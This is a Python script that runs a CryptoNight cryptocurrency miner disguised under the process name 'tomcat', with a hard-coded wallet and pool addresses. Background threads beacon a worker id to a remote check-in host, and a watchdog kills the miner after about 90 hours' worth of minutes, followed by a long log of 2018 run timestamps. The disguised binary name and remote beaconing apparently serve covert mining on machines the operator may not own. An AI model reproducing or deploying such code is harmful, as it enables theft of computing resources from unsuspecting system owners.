import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:03.910823
#2018-02-17 17:21:05.948456
#2018-02-17 19:09:03.149389
#2018-02-17 20:57:04.947971
#2018-02-17 22:42:07.418151
#2018-02-18 00:26:04.286857
#2018-02-18 02:17:07.180863
#2018-02-18 04:05:05.418343
#2018-02-18 05:54:07.268589
#2018-02-18 07:44:06.657760
#2018-02-18 09:33:06.557479
#2018-02-18 11:19:01.368754
#2018-02-18 13:05:05.378414
#2018-02-18 14:52:05.824962
#2018-02-18 16:41:05.555061
#2018-02-18 18:30:08.637762
#2018-02-18 20:18:05.801479
#2018-02-18 22:03:03.276309
#2018-02-18 23:52:07.190841
#2018-02-19 01:38:01.808269
#2018-02-19 03:26:01.289007
#2018-02-19 05:11:06.244145
#2018-02-19 06:58:03.638112
#2018-02-19 08:45:09.299921
#2018-02-19 10:34:08.520846
#2018-02-19 12:21:08.443358
#2018-02-19 14:08:01.944595
#2018-02-19 15:57:03.878052
#2018-02-19 17:47:16.079508
#2018-02-19 19:33:07.094090
#2018-02-19 21:20:04.901026
#2018-02-19 23:05:08.177099
#2018-02-20 00:48:06.112961
#2018-02-20 02:38:07.370726
#2018-02-20 04:28:04.529807
#2018-02-20 06:13:02.171852
#2018-02-20 07:58:01.751447
#2018-02-20 09:44:03.874371
#2018-02-20 11:28:01.664977
#2018-02-20 13:16:04.035052
#2018-02-20 15:01:03.879196
#2018-02-20 16:47:13.107011
#2018-02-20 18:36:08.004146
#2018-02-20 20:27:07.377713
#2018-02-20 22:14:06.071053
#2018-02-20 23:55:07.890170
#2018-02-21 01:39:06.540003
#2018-02-21 03:26:04.941077
#2018-02-21 05:14:04.508051
#2018-02-21 07:03:02.051575
#2018-02-21 08:49:01.321095
#2018-02-21 10:36:07.693791
#2018-02-21 12:24:01.734031
#2018-02-21 14:10:11.241763
#2018-02-21 15:55:04.184899
#2018-02-21 17:49:01.640305
#2018-02-21 19:34:09.212486
#2018-02-21 21:23:04.903220
#2018-02-21 23:10:08.398565
#2018-02-22 00:59:07.744609
#2018-02-22 02:48:04.149216
#2018-02-22 04:34:07.860586
#2018-02-22 06:19:07.230564
#2018-02-22 08:06:06.011885
#2018-02-22 09:53:01.551165
#2018-02-22 11:37:07.421383
#2018-02-22 13:24:01.457017
#2018-02-22 15:11:08.286482
#2018-02-22 16:54:10.218409
#2018-02-22 18:43:01.448563
#2018-02-22 20:34:07.279172
#2018-02-22 22:19:06.380625
#2018-02-23 00:07:01.311585
#2018-02-23 01:55:07.887762
#2018-02-23 03:45:09.142685
#2018-02-23 05:33:05.734930
#2018-02-23 07:18:01.984598
#2018-02-23 09:22:06.552862
#2018-02-23 11:29:01.641785
#2018-02-23 13:19:06.181351
#2018-02-23 15:04:05.334353
#2018-02-23 16:53:01.960647
#2018-02-23 18:40:01.328156
#2018-02-23 20:27:06.292852
#2018-02-23 22:15:08.938766
#2018-02-24 00:03:04.128488
#2018-02-24 01:53:04.858820
#2018-02-24 03:44:04.209935
#2018-02-24 05:33:05.210173
#2018-02-24 07:19:03.914345
#2018-02-24 09:09:04.745722
#2018-02-24 10:45:05.238404
#2018-02-24 12:29:05.472389
#2018-02-24 14:02:05.508841
#2018-02-24 15:45:01.516821
#2018-02-24 17:20:08.277918
#2018-02-24 18:54:01.305787
#2018-02-24 20:26:07.068488
#2018-02-24 21:57:01.543877
#2018-02-25 02:32:04.387846
#2018-02-25 06:13:03.799392
#2018-02-25 11:40:08.639108